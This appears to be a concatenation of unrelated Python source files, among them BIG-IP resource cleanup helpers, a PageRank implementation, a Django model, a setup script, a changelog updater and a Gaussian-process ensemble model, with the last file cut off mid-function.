network_helper = NetworkHelper()
if folder not in self.exempt_folders:
# First remove all LTM resources.
ltm_types = [
ResourceType.virtual,
ResourceType.pool,
ResourceType.http_monitor,
ResourceType.https_monitor,
ResourceType.tcp_monitor,
ResourceType.ping_monitor,
ResourceType.node,
ResourceType.snat,
ResourceType.snatpool,
ResourceType.snat_translation,
ResourceType.rule
]
for ltm_type in ltm_types:
resource = BigIPResourceHelper(ltm_type)
[r.delete() for r in resource.get_resources(bigip, folder)]
# Remove all net resources
net_types = [
ResourceType.arp,
ResourceType.selfip,
ResourceType.vlan,
ResourceType.route_domain
]
for net_type in net_types:
resource = BigIPResourceHelper(net_type)
[r.delete() for r in resource.get_resources(bigip, folder)]
# Tunnels and fdb's require some special attention.
resource = BigIPResourceHelper(ResourceType.tunnel)
tunnels = resource.get_resources(bigip, folder)
for tunnel in tunnels:
network_helper.delete_all_fdb_entries(
bigip, tunnel.name, folder)
network_helper.delete_tunnel(
bigip, tunnel.name, folder)
def purge_folder(self, bigip, folder):
if folder not in self.exempt_folders:
self.delete_folder(bigip, folder)
else:
LOG.error(
('Request to purge exempt folder %s ignored.' %
folder))
def get_tenant_folder_count(self, bigip):
folders = bigip.tm.sys.folders.get_collection()
# ignore '/' and 'Common'
tenants = [item for item in folders if item.name != '/' and
item.name != 'Common']
return len(tenants)
|
import os
import random
import re
import sys
DAMPING = 0.85
SAMPLES = 10000
def main():
if len(sys.argv) != 2:
sys.exit("Usage: python pagerank.py corpus")
corpus = crawl(sys.argv[1])
ranks = sample_pagerank(corpus, DAMPING, SAMPLES)
print(f"PageRank Results from Sampling (n = {SAMPLES})")
for page in sorted(ranks):
print(f" {page}: {ranks[page]:.4f}")
ranks = iterate_pagerank(corpus, DAMPING)
print(f"PageRank Results from Iteration")
for page in sorted(ranks):
print(f" {page}: {ranks[page]:.4f}")
def crawl(directory):
"""
Parse a directory of HTML pages and check for links to other pages.
Return a dictionary where each key is a page, and values are
a list of all other pages in the corpus that are linked to by the page.
"""
pages = dict()
# Extract all links from HTML files
for filename in os.listdir(directory):
if not filename.endswith(".html"):
continue
with open(os.path.join(directory, filename)) as f:
contents = f.read()
links = re.findall(r"<a\s+(?:[^>]*?)href=\"([^\"]*)\"", contents)
pages[filename] = set(links) - {filename}
# Only include links to other pages in the corpus
for filename in pages:
pages[filename] = set(
link for link in pages[filename]
if link in pages
)
return pages
def transition_model(corpus, page, damping_factor):
"""
Return a probability distribution over which page to visit next,
given a current page.
With probability `damping_factor`, choose a link at random
linked to by `page`. With probability `1 - damping_factor`, choose
a link at random chosen from all pages in the corpus.
"""
# probability-list to initialize weights for random no. generator
p = [damping_factor, 1 - damping_factor]
prob = dict()
linked = set()
unlinked = set()
# from the corpus, get the list of pages that the current page is linked to
# and the list of pages the current page is not linked to
# also set the transition model probabiilties to 0.0 initially
for key, value in corpus.items():
prob[key] = 0.0
if key != page:
continue
else:
linked = value
unlinked = set()
for key in corpus:
if key in linked:
continue
else:
unlinked.add(key)
# each page starts with a base probability of reach of (1 - damping_factor)/total_pages
# then each page linked to this page gets an additional probability of
# damping_factor / no_of_links
linked_count = len(linked)
unlinked_count = len(unlinked)
count = linked_count + unlinked_count
prob_0 = p[1] / count
for key in prob:
if key in linked:
prob[key] = prob_0+ damping_factor / linked_count
else:
prob[key] = prob_0
return prob
def sample_pagerank(corpus, damping_factor, n):
"""
Return PageRank values for each page by sampling `n` pages
according to transition model, starting with a page at random.
Return a dictionary where keys are page names, and values are
their estimated PageRank value (a value between 0 and 1). All
PageRank values should sum to 1.
"""
# Initialise dictionary
keys = corpus.keys()
sample = dict()
for key in keys:
sample[key] = 0
# Random starting page
random_page = random.choice(list(keys))
sample[random_page] += 1 / n
for _ in (range(n-1)):
prob = transition_model(corpus, random_page, damping_factor)
next_pages = []
probabilities = []
for key, value in prob.items():
next_pages.append(key)
probabilities.append(value)
random_page = random.choices(next_pages, weights=probabilities)[0]
sample[random_page] += 1 / n
return sample
def iterate_pagerank(corpus, damping_factor):
"""
Return PageRank values for each page by iteratively updating
PageRank values until convergence.
Return a dictionary where keys are page names, and values are
their estimated PageRank value (a value between 0 and 1). All
PageRank values should sum to 1.
"""
# Total number of pages
num_total_pages = len(corpus)
# Start with 1/N for all pages
rank_old = dict()
for page in corpus:
rank_old[page] = 1 / num_total_pages
while True:
rank_new = dict()
# Calculate PageRank
for page_new in corpus:
rank_page_new = (1 - damping_factor) / num_total_pages
for page, links in corpus.items():
if links:
if page != page_new and page_new in links:
rank_page_new += damping_factor * (rank_old[page] / len(corpus[page]))
else:
rank_page_new += damping_factor * (rank_old[page] / num_total_pages)
rank_new[page_new] = rank_page_new
# Stop if Ranks converged
if rank_convergence(rank_new, rank_old):
return rank_new
rank_old = rank_new.copy()
def rank_convergence(new_rank, old_rank):
for page in new_rank:
# If new probability not calculated
if not new_rank[page]:
return False
# Convergence at 0.001
diff = new_rank[page] - old_rank[page]
if diff > 0.001:
return False
return True
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
# The MIT License (MIT)
#
# Copyright (c) 2015 Alex Headley <aheadley@waysaboutstuff.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from functools import reduce
ROTL = lambda uint32, bits: CAST_TO_UINT32((uint32 << bits) | CAST_TO_CHAR(uint32 >> (32 - bits)))
SPLIT_TO_BYTES = lambda uint32: bytearray((uint32 & (0xFF << s)) >> s \
for s in range(0, 32, 8))
CAST_TO_CHAR = lambda uint32: uint32 & 0xFF
CAST_TO_UINT32 = lambda value: value & 0xFFFFFFFF
COMBINE_BYTES = lambda bytes: reduce(
lambda p, n: p | (n[0] << n[1]),
zip(bytes, xrange(0, 32, 8)), 0)
|
from django.db import models
from django.contrib.auth.models import User
from classroom.models import Classroom
from PIL import Image
# Create your models here.
class Profile(models.Model):
user = models.OneToOneField(User,on_delete = models.CASCADE)
image = models.ImageField(default = 'users/profile_pics/default.jpg', upload_to='users/profile_pics/')
def __str__(self):
return f'{self.user.username} Profile'
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
super().save(force_insert, force_update, using, update_fields)
img = Image.open(self.image.path)
if img.height > 300 or img.width > 300:
output_size = (300,300)
img.thumbnail(output_size)
img.save(self.image.path)
|
from PandasToPowerpoint import df_to_powerpoint
import pandas as pd
df = pd.DataFrame({'District':['Hampshire', 'Dorset', 'Wiltshire', 'Worcestershire'],
'Population':[25000, 500000, 735298, 12653],
'Ratio':[1.56, 7.34, 3.67, 8.23]})
df_to_powerpoint(r"C:\Code\Powerpoint\test58.pptx", df,
col_formatters=['', ',', '.2'], rounding=['', 3, ''])
|
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Entrypoint for running Spark history server."""
import logging
import click
from smspark import history_server_utils, nginx_utils
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
@click.command(context_settings=dict(allow_interspersed_args=False))
@click.option(
"--event-logs-s3-uri", required=True, help="S3 uri stores spark events that history server can read from",
)
@click.option(
"--remote-domain-name", help="Domain name of remote device when history server is running remotely",
)
@click.pass_context
def run_history_server(ctx: click.Context, event_logs_s3_uri: str, remote_domain_name: str) -> None:
"""Run the Spark History Server."""
nginx_utils.start_nginx(remote_domain_name)
log.info("Running spark history server")
history_server_utils.start_history_server(event_logs_s3_uri)
|
import sys, os, platform, glob
from distutils.core import setup
from setuptools import *
"""
Setup script for FusionVet -- A bioinformatics tool to visualize and evaluate *known* gene fusions.
"""
def main():
setup( name = "FusionVet",
version = "1.0.1",
python_requires='>=3.5',
py_modules = [ 'psyco_full' ],
packages = find_packages( 'lib' ),
package_dir = { '': 'lib' },
package_data = { '': ['*.ps'] },
scripts = glob.glob( "bin/*.py"),
ext_modules = [],
test_suite = 'nose.collector',
setup_requires = ['nose>=0.10.4'],
author = "Liguo Wang",
author_email ="wangliguo78@gmail.com",
platforms = ['Linux','MacOS'],
requires = [],
install_requires = ['numpy','scipy','pysam'],
description = "A bioinformatics tool to visualize and evaluate *known* gene fusions",
url = "https://fusionvet.readthedocs.io/en/latest/index.html",
zip_safe = False,
dependency_links = [],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Programming Language :: Python',
'Topic :: Scientific/Engineering :: Bio-Informatics',
],
keywords='gene fusion, validation, visualization, UCSC, BAM, bed, bigBed, interact, bigInteract',
)
if __name__ == "__main__":
main()
|
"""Insert the new version changes in the changelog."""
import re
import sys
import requests
from git_changelog.build import Changelog
from jinja2.sandbox import SandboxedEnvironment
TEMPLATE_URL = "https://raw.githubusercontent.com/pawamoy/jinja-templates/master/keepachangelog.md"
COMMIT_STYLE = "angular"
if __name__ == "__main__":
if len(sys.argv) != 4:
print("usage: update_changelog.py <FILE> <MARKER> <VERSION_REGEX>", file=sys.stderr)
sys.exit(1)
env = SandboxedEnvironment(autoescape=True)
template = env.from_string(requests.get(TEMPLATE_URL).text)
changelog = Changelog(".", style=COMMIT_STYLE)
inplace_file, marker, version_regex = sys.argv[1:]
with open(inplace_file, "r") as fd:
old_lines = fd.read().splitlines(keepends=False)
# get last version
version_re = re.compile(version_regex)
last_released = None
for line in old_lines:
match = version_re.search(line)
if match:
last_released = match.groupdict()["version"]
break
# only keep more recent versions
versions = []
for version in changelog.versions_list:
if version.tag == last_released:
break
versions.append(version)
changelog.versions_list = versions
# render and insert
rendered = template.render(changelog=changelog, inplace=True)
for i in range(len(old_lines)):
if old_lines[i] == marker:
old_lines[i] = rendered
break
i += 1
with open(inplace_file, "w") as fd:
fd.write("\n".join(old_lines).rstrip("\n") + "\n")
|
"""
Binary search is a classic recursive algorithm.
It is used to efficiently locate a target value within a sorted sequence of n elements.
"""
def binary_search(data, target, low, high):
"""Binary search implementation, inefficient, O(n)
Return True if target is found in indicated portion of a list.
The search only considers the portion from low to high inclusive.
"""
if low > high:
return False # interval is empty - no match.
else:
mid = (low + high) // 2
if target == data[mid]:
return True
elif target < data[mid]:
return binary_search(data, target, low, mid-1)
else:
return binary_search(data, target, mid+1, high)
def binary_search_iterative(data, target):
"""Return True if target is foudn in the given list."""
low = 0
high = len(data) - 1
while low <= high:
mid = (low + high) // 2
if target == data[mid]: # Found a match.
return True
elif target < data[mid]:
high = mid - 1 # consider values left of mid.
else:
low = mid + 1 # consider values right of mid.
return False
|
import discord
from discord.ext import commands
class Development(commands.Cog):
def __init__(self, bot):
self.bot = bot
def setup(bot):
bot.add_cog(Development(bot))
|
import os
import time
import numpy as np
import collections
import scipy
import scipy.sparse
import scipy.sparse.linalg
import scikits.sparse.cholmod
import sklearn.preprocessing
import hashlib
import types
import marshal
import pyublas
import cPickle as pickle
from collections import OrderedDict
from sigvisa.treegp.gp import GP, GPCov
from sigvisa.treegp.features import featurizer_from_string, recover_featurizer
from sigvisa.treegp.cover_tree import VectorTree
from sigvisa.models.spatial_regression.baseline_models import ParamModel
from sigvisa.utils.fileutils import mkdir_p
class LocalGPEnsemble(ParamModel):
def _build_local_gps(self, X, y, yvars, **kwargs):
cluster_distances = self.cluster_tree.kernel_matrix(pyublas.why_not(X),
pyublas.why_not(self.cluster_centers), True)
closest_cluster = np.argmin(cluster_distances, axis=1)
local_gps = []
sorted_X = []
sorted_y = []
sorted_yvars = []
for i, ctr in enumerate(self.cluster_centers):
cov = self.cluster_covs[i]
noise_var = self.cluster_noise_vars[i]
cluster_idxs = (closest_cluster == i)
cluster_X = X[cluster_idxs]
cluster_y = y[cluster_idxs]
cluster_yvars = yvars[cluster_idxs]
if len(cluster_y) == 0:
cluster_X = np.zeros((1, 5,))
cluster_y = np.zeros((1,))
cluster_yvars = np.ones((1,)) * 1e20
sorted_X.append(cluster_X)
sorted_y.append(cluster_y)
sorted_yvars.append(cluster_yvars)
lgp = GP(X=cluster_X, y=cluster_y, y_obs_variances=cluster_yvars,
cov_main=cov, noise_var=noise_var,
sort_events=False,
sparse_invert=False,
**kwargs)
local_gps.append(lgp)
sorted_X = np.vstack(sorted_X)
sorted_y = np.concatenate(sorted_y)
sorted_yvars = np.concatenate(sorted_yvars)
return local_gps, sorted_X, sorted_y, sorted_yvars
def __init__(self, X, y,
cluster_centers,
cluster_covs,
cluster_noise_vars,
yvars = None,
basis=None,
extract_dim = None,
prior_mean=None,
prior_cov=None,
featurizer_recovery=None,
**kwargs):
ParamModel.__init__(self, **kwargs)
self.cluster_centers = cluster_centers
self.cluster_covs = cluster_covs
self.cluster_noise_vars = cluster_noise_vars
self.cluster_metric = GPCov(wfn_str="se", dfn_str="lld", dfn_params=(1.0, 1.0), wfn_params=(1.0,))
self.cluster_tree = VectorTree(cluster_centers, 1, *self.cluster_metric.tree_params())
if yvars is None:
yvars = np.zeros(y.shape)
self.local_gps, self.X, self.y, self.yvars = self._build_local_gps(X, y, yvars,
compute_ll=(basis is None))
self.local_gp_cache = None
self.n = len(self.y)
self.basis = basis
self.extract_dim = extract_dim
self.prior_mean = prior_mean
self.prior_cov = prior_cov
self.featurizer_recovery = featurizer_recovery
# setup parametric features if needed
H = None
self.featurizer = None
self.featurizer_recovery = None
if featurizer_recovery is None:
if basis is not None:
H, self.featurizer, self.featurizer_recovery = featurizer_from_string(self.X, basis, extract_dim=extract_dim, transpose=True)
else:
self.featurizer, self.featurizer_recovery = recover_featurizer(basis, featurizer_recovery, transpose=True)
H = self.featurizer(self.X)
self.Kinv = scipy.sparse.block_diag([gp.Kinv for gp in self.local_gps])
self.L = scipy.sparse.block_diag([gp.L for gp in self.local_gps])
self.alpha = np.concatenate([gp.alpha_r.flatten() for gp in self.local_gps])
self.local_cumpts = np.cumsum([lgp.n for lgp in self.local_gps])
def build_low_rank_model(alpha, Kinv_sp, H, b, Binv):
"""
let n be the training size; we'll use an additional rank-m approximation.
the notation here follows section 2.7 in Rasmussen & Williams. For
simplicity, K refers to the observation covariance matrix rather than the
underlying function covariance (i.e. it might really be K+noise_var*I, or
K+diag(y_obs_variances), etc.)
takes:
alpha: n x 1, equal to K^-1 y
Kinv_sp: n x n sparse matrix, equal to K^-1
H: n x m features of training data (this is Qfu for FIC)
b: m x 1 prior mean on feature weights (this is 0 for FIC)
B: m x m prior covariance on feature weights (this is Quu for FIC)
returns:
invc = inv(chol(M)), where M = (B^-1 + H K^-1 H^T)^-1 is the
posterior covariance matrix on feature weights
beta_bar = M (HK^-1y + B^-1 b) gives the weights for the correction
of the low-rank component to the mean prediction
HKinv = HK^-1 comes up in the marginal likelihood computation, so we
go ahead and remember the value we compute now.
"""
# tmp = H * K^-1 * y + B^-1 * b
tmp = np.reshape(np.asarray(np.dot(H, alpha)), (-1,))
tmp += np.dot(Binv, b)
HKinv = H * Kinv_sp
M_inv = Binv + np.dot(HKinv, H.T)
c = scipy.linalg.cholesky(M_inv, lower=True)
beta_bar = scipy.linalg.cho_solve((c, True), tmp)
invc = scipy.linalg.inv(c)
return c, invc, beta_bar, HKinv
if self.basis is None:
self.n_features = 0
else:
self.n_features = len(self.prior_mean)
b = self.prior_mean
Binv = np.linalg.inv(self.prior_cov)
self.c, self.invc,self.beta_bar, self.HKinv = build_low_rank_model(self.alpha,
self.Kinv,
H, b, Binv)
self.z = np.dot(H.T, b) - self.y
def _x_to_cluster(self, X1):
dists = self.cluster_tree.kernel_matrix(X1, self.cluster_centers, True)
return np.argmin(dists, axis=1)
def param_mean(self):
try:
return self.beta_bar
except:
return np.zeros((0,))
def param_covariance(self, chol=False):
if chol:
return self.invc
else:
return np.dot(self.invc.T, self.invc)
def get_data_features(self, X):
# compute the full set of features for a matrix X of test points
features = np.zeros((self.n_features, X.shape[0]))
i = 0
if self.featurizer is not None:
F = self.featurizer(X)
i = F.shape[0]
features[:i,:] = F
return features
def sample(self, cond, include_obs=True, **kwargs):
mean = self.predict(cond)
variance = self.variance(cond, include_obs=include_obs)
return np.random.randn() * np.sqrt(variance) + mean
def log_p(self, x, cond, include_obs=True, **kwargs):
y = float(x)
mean = float(self.predict(cond))
variance = float(self.variance(cond, include_obs=include_obs))
return - .5 * ((y-mean)**2 / variance + np.log(2*np.pi*variance) )
def force_load_localgps(self):
self.cache_capacity = len(self.local_gps)
for i in range(len(self.local_gps)):
self.local_gps[i] = self.get_local_gp(i)
def get_local_gp(self, idx):
# note there's no real reason for a separate self.local_gps
# and self.local_gp_cache, so self.local_gps could probably be
# eliminated.
idx = int(idx)
if self.local_gps[idx] is None:
fname = os.path.join(self.lazyload_localgp_dir, "local%03d.gp" % idx)
lgp = GP(fname=fname, sparse_invert=True)
self.local_gps[idx] = lgp
if self.local_gp_cache is not None:
# if needed, evict oldest from cache, and delete from self.local_gps
if len(self.local_gp_cache) >= self.cache_capacity:
k, v = self.local_gp_cache.popitem(last=False)
self.local_gps[k] = None
nloaded = len(self.local_gp_cache)
#print "loaded lgp %s, total loaded %d" % (fname, nloaded)
if self.local_gp_cache is not None:
if idx in self.local_gp_cache:
_ = self.local_gp_cache.pop(idx)
self.local_gp_cache[idx] = self.local_gps[idx]
return self.local_gps[idx]
def predict(self, cond, **kwargs):
# TODO: cache features and R between predict and variance calls...
X1 = self.standardize_input_array(cond).astype(np.float)
cluster_idx = self._x_to_cluster(X1)
lgp = self.get_local_gp(cluster_idx)
gp_pred = float(lgp.predict(X1))
if self.n_features > 0:
query_K = lgp.get_query_K(X1, no_R=True)
H = self.get_data_features(X1)
k = self.local_cumpts[cluster_idx-1] if cluster_idx > 0 else 0
local_HKinv = np.matrix(self.HKinv[:, k:k+lgp.n])
R = H - local_HKinv * query_K
gp_pred += float(np.dot(R.T, self.beta_bar))
return gp_pred
def variance(self, cond, **kwargs):
X1 = self.standardize_input_array(cond).astype(np.float)
assert(X1.shape[0] == 1)
cluster_idx = self._x_to_cluster(X1)
lgp = self.get_local_gp(cluster_idx)
gp_variance = float(lgp.variance(X1, **kwargs))
if self.n_features > 0:
query_K = lgp.get_query_K(X1, no_R=True)
H = self.get_data_features(X1)
k = self.local_cumpts[cluster_idx-1] if cluster_idx > 0 else 0
local_HKinv = np.matrix(self.HKinv[:, k:k+lgp.n])
R = H - local_HKinv * query_K
tmp = np.dot(self.invc, R)
mean_cov = np.dot(tmp.T, tmp)
gp_variance += float(mean_cov)
return gp_variance
def log_likelihood(self):
self.force_load_localgps()
if self.n_features == 0:
ll = np.sum([gp.log_likelihood() for gp in self.local_gps])
return ll
Kinv = self.Kinv
z = self.z
tmp1 = Kinv * z
term1 = np.dot(z.T, tmp1)
tmp2 = np.dot(self.HKinv, z)
tmp3 = np.dot(self.invc, tmp2)
term2 = np.dot(tmp3.T, tmp3)
# following eqn 2.43 in R&W, we want to compute
# log det(K + H.T * B * H). using the matrix inversion
# lemma, we instead compute
# log det(K) + log det(B) + log det(B^-1 + H*K^-1*H.T)
# to compute log(det(K)), we use the trick that the
# determinant of a symmetric pos. def. matrix is the
# product of squares of the diagonal elements of the
# Cholesky factor
ldiag = self.L.diagonal()
ld2_K = np.log(ldiag).sum()
ld2 = np.log(np.diag(self.c)).sum() # det( B^-1 - H * K^-1 * H.T )
ld_B = np.linalg.slogdet(self.prior_cov)[1]
# eqn 2.43 in R&W, using the matrix inv lemma
ll = -.5 * (term1 - term2 + self.n * np.log(2*np.pi) + ld_B) - ld2_K - ld2
return ll
def log_likelihood_gradient(self):
nparams = np.sum([len(c.flatten())+1 for c in self.cluster_covs])
grad = np.zeros((nparams,))
if self.n_features > 0:
tmp = np.dot(self.invc, self.HKinv)
K_HBH_inv = self.Kinv - np.dot(tmp.T, tmp)
alpha = np.matrix(np.reshape(np.dot(K_HBH_inv, self.z), (-1, 1)))
M = np.matrix(K_HBH_inv)
else:
M = self.Kinv.todense()
alpha = self.alpha
npts = 0
nparams = 0
self.force_load_localgps()
for k, lgp in enumerate(self.local_gps):
lgp.distance_cache_XX = lgp.predict_tree.kernel_matrix(lgp.X, lgp.X, True)
n_main_params = len(lgp.cov_main.flatten())
local_alpha = alpha[npts:npts+lgp.n]
local_M = M[npts:npts+lgp.n][:, npts:npts+lgp.n]
npts += lgp.n
for i in range(n_main_params+1):
dKdi = lgp.get_dKdi_dense(i, n_main_params, 0)
dlldi = .5 * np.dot(local_alpha.T, np.dot(dKdi, local_alpha))
# here we use the fact:
# trace(AB) = sum_{ij} A_ij * B_ij
dlldi -= .5 * np.sum(np.sum(np.multiply(local_M.T, dKdi)))
grad[nparams ] = dlldi
nparams += 1
return grad
def get_flat_params(self):
params = []
self.force_load_localgps()
for lgp in self.local_gps:
params.append(lgp.noise_var)
params += list(lgp.cov_main.flatten())
return params
def __getstate__(self):
d = self.__dict__.copy()
del d["cluster_tree"]
n = len(self.local_gps)
d['local_gps'] = [None,] * n
try:
del d["Kinv"]
except:
pass
try:
del d["L"]
except:
pass
try:
del d["featurizer"]
except:
pass
return d
def __setstate__(self, d):
self.__dict__ = d
self.local_gp_cache = OrderedDict()
self.cluster_tree = VectorTree(self.cluster_centers, 1, *self.cluster_metric.tree_params())
if self.basis is not None:
self.featurizer, self.featurizer_recovery = recover_featurizer(self.basis, self.featurizer_recovery, transpose=True)
else:
self.featurizer = None
self.featurizer_recovery = None
def save_trained_model(self, fname):
mkdir_p(fname)
for i, lgp in enumerate(self.local_gps):
local_fname = os.path.join(fname, "local%03d.gp" % i)
lgp.save_trained_model(local_fname, tight=True)
with open(os.path.join(fname, "main.pkl"), "wb") as f:
pickle.dump(self, f)
def load_lgp_ensemble(fname, cache_capacity=15):
with open(os.path.join(fname, "main.pkl"), "rb") as f:
lgp = pickle.load(f)
lgp.lazyload_localgp_dir = fname
lgp.cache_capacity = cache_capacity
#lgp.force_load_localgps()
return lgp
def optimize_localgp_hyperparams(noise_prior=None,
cov_main=None,
cluster_centers=None,
y_list = None,
yvars_list = None,
force_unit_var=False,
**kwargs):
n_clusters = len(cluster_centers)
n_wfn = len(cov_main.wfn_params)
n_dfn = len(cov_main.dfn_params)
nparams = 1 + n_wfn + n_dfn
nparams *= n_clusters
if y_list is None:
y_list = [kwargs["y"],]
del kwargs["y"]
if yvars_list is None:
if "yvars" in kwargs:
yvars_list = [kwargs["yvars"]]
del kwargs["yvars"]
else:
yvars_list = [None,] * len(y_list)
def expand_reduced_params(rparams):
# given a set of params that includes only the signal/noise
# ratio, expand to the full parameterization assuming unit
# total variance.
# standard param order:
# noise var, signal var, lscale horiz, lscale depth
params = []
for i in range(0, len(rparams), 3):
# ratio = nv/sv = nv / (1-nv)
ratio10 = rparams[i]
ratio = ratio10 / 10.0
nv = ratio / (1.+ratio)
if nv == 1.0:
nv = 1.-1e-10
elif nv == 0.0:
nv = 1e-10
sv = 1.0-nv
lscale_horiz = rparams[i+1]
lscale_depth = rparams[i+2]
params.append(nv)
params.append(sv)
params.append(lscale_horiz)
params.append(lscale_depth)
return np.array(params)
def reduce_params(params):
rparams = []
for i in range(0, len(params), 4):
# ratio = nv/sv = nv / (1-nv)
nv = params[i]
sv = params[i+1]
ratio = nv/sv
ratio10 = ratio * 10
lscale_horiz = params[i+2]
lscale_depth = params[i+3]
rparams.append(ratio10)
rparams.append(lscale_horiz)
rparams.append(lscale_depth)
return np.array(rparams)
def grad_reduced_params(gfull, params):
rgrad = []
for i in range(0, len(gfull), 4):
d_nv = gfull[i]
d_sv = gfull[i+1]
d_lhoriz = gfull[i+2]
d_ldepth = gfull[i+3]
nv = params[i]
sv = params[i+1]
ratio = nv/sv
# dll_dratio = dll_dnv dnv_dratio + dll_dsv dsv_dratio
d_ratio = d_nv * 1./(ratio+1.)**2 + d_sv * -1. / (ratio+1.)**2
d_ratio10 = d_ratio / 10.0
rgrad.append(d_ratio10)
rgrad.append(d_lhoriz)
rgrad.append(d_ldepth)
return np.array(rgrad)
def covs_from_vector(params):
covs = []
noise_vars = []
k = 0
for c in cluster_centers:
new_cov = cov_main.copy()
nv = params[k]
k += 1
new_cov.wfn_params = np.array(params[k:k+n_wfn])
k += n_wfn
new_cov.dfn_params = np.array(params[k:k+n_dfn])
k += n_dfn
covs.append(new_cov)
noise_vars.append(nv)
return covs, noise_vars
def nllgrad(v):
if not np.all(np.isfinite(v)):
return np.float('inf'), np.zeros(v.shape)
try:
expv = np.exp(v)
if force_unit_var:
expv = expand_reduced_params(expv)
cluster_covs, cluster_noise_vars = covs_from_vector(expv)
grad_expv = np.zeros(expv.shape)
ll = 0.0
for i, (y, yvars) in enumerate(zip(y_list, yvars_list)):
lgps = LocalGPEnsemble(cluster_centers=cluster_centers,
cluster_covs=cluster_covs,
cluster_noise_vars=cluster_noise_vars,
y=y, yvars=yvars, **kwargs)
param_ll = lgps.log_likelihood()
ll += param_ll
grad_expv += lgps.log_likelihood_gradient()
del lgps
prior_grad = []
priorll = 0.0
for i, cc in enumerate(cluster_centers):
priorll += noise_prior.log_p(cluster_noise_vars[i])
priorll += cluster_covs[i].prior_logp()
prior_grad.append(noise_prior.deriv_log_p(cluster_noise_vars[i]))
prior_grad += list(cluster_covs[i].prior_grad())
prior_grad = np.array(prior_grad)
grad_expv += prior_grad
ll += priorll
if force_unit_var:
grad_expv = grad_reduced_params(grad_expv, expv)
grad_v = grad_expv * np.exp(v)
#print "expv", expv, "ll", ll
if np.isinf(ll):
import pdb; pdb.set_trace()
if np.isinf(np.sum(grad_v)):
import pdb; pdb.set_trace()
if np.isnan(grad_v).any():
print "warning: nans in gradient", grad_v
grad_v[np.isnan(grad_v)] = 0.0
ll = min(ll, -1e100)
except FloatingPointError as e:
print "warning: floating point error (%s) in likelihood computation, returning likelihood -inf" % str(e)
ll = np.float("-inf")
grad_v = np.zeros((len(v),))
except np.linalg.linalg.LinAlgError as e:
print "warning: lin alg error (%s) in likelihood computation, returning likelihood -inf" % str(e)
ll = np.float("-inf")
grad_v = np.zeros((len(v),))
except scikits.sparse.cholmod.CholmodError as e:
print "warning: cholmod error (%s) in likelihood computation, returning likelihood -inf" % str(e)
ll = np.float("-inf")
grad_v = np.zeros((len(v),))
#except ValueError as e:
# print "warning: value error (%s) in likelihood computation, returning likelihood -inf" % str(e)
# ll = np.float("-inf")
# grad = np.zeros((len(v),))
#print "hyperparams", v, "ll", ll, 'grad', grad
return -1 * ll, (-1 * grad_v if grad_v is not None else None)
def build_gp(v, **kwargs2):
expv = np.exp(v)
if force_unit_var:
expv = expand_reduced_params(expv)
cluster_covs, cluster_noise_vars = covs_from_vector(expv)
kw = dict(kwargs.items() + kwargs2.items())
gps = []
for (y, yvars) in zip(y_list, yvars_list):
gp = LocalGPEnsemble(cluster_centers=cluster_centers,
cluster_noise_vars=cluster_noise_vars,
cluster_covs=cluster_covs,
y=y, yvars=yvars, **kw)
gps.append(gp)
if len(gps) == 1:
return gp
else:
return gps
noise_var_default = noise_prior.predict()
if force_unit_var:
x0 = np.concatenate([[0.4, 0.6,] + list(cov_main.flatten())[1:] for i in range(n_clusters)])
x0 = reduce_params(x0)
else:
x0 = np.concatenate([[noise_var_default,] + list(cov_main.flatten()) for i in range(n_clusters)])
x0 = np.log(x0)
return nllgrad, x0, build_gp, covs_from_vector
|
"""
General usage script
-
Expected usage: user defines a configuration file then runs this script on that file. The user is expected
to do this through the jupyter notebook.
"""
# Pathfinder imports
from pathfinder.world.dome import Dome
from pathfinder.world.devtools import DevAxes, DevCompassMarkings
from pathfinder.world.beetle import Beetle
from pathfinder.util.legends import *
from pathfinder.util.deserialiser import Deserialiser
import pathfinder.configuration as conf
import pathfinder.definitions as defn
# Python library imports
from mpl_toolkits.mplot3d import Axes3D # This seems to be required, though PyCharm disagrees
import matplotlib.pyplot as plt
import numpy as np
import os
def main(config_file=""):
# If a config file is specified,
if config_file != "":
defn.CONFIG_FILE = os.path.join(defn.CONFIG_DIR, config_file)
# DEBUG #
#print("Project root directory: " + defn.ROOT_DIR)
#print("Using configuration file: " + defn.CONFIG_FILE)
deserialiser = Deserialiser(configuration_path=defn.CONFIG_FILE)
deserialiser.init_configuration()
devcompass = DevCompassMarkings()
dome = Dome()
beetle = Beetle()
entity_list = [dome, devcompass]
# Get roll configuration from conf module
cue_list_roll_one = conf.cues_roll_one
cue_list_roll_two = conf.cues_roll_two
plt.close('all')
fig = plt.figure()
# 3D world axes
first_roll_world_ax = fig.add_subplot(221, projection='3d')
second_roll_world_ax = fig.add_subplot(222, projection='3d')
# Polar axes
first_roll_polar_ax = fig.add_subplot(223, projection='polar')
second_roll_polar_ax = fig.add_subplot(224, projection='polar')
# Add world entities to both axes
for x in entity_list:
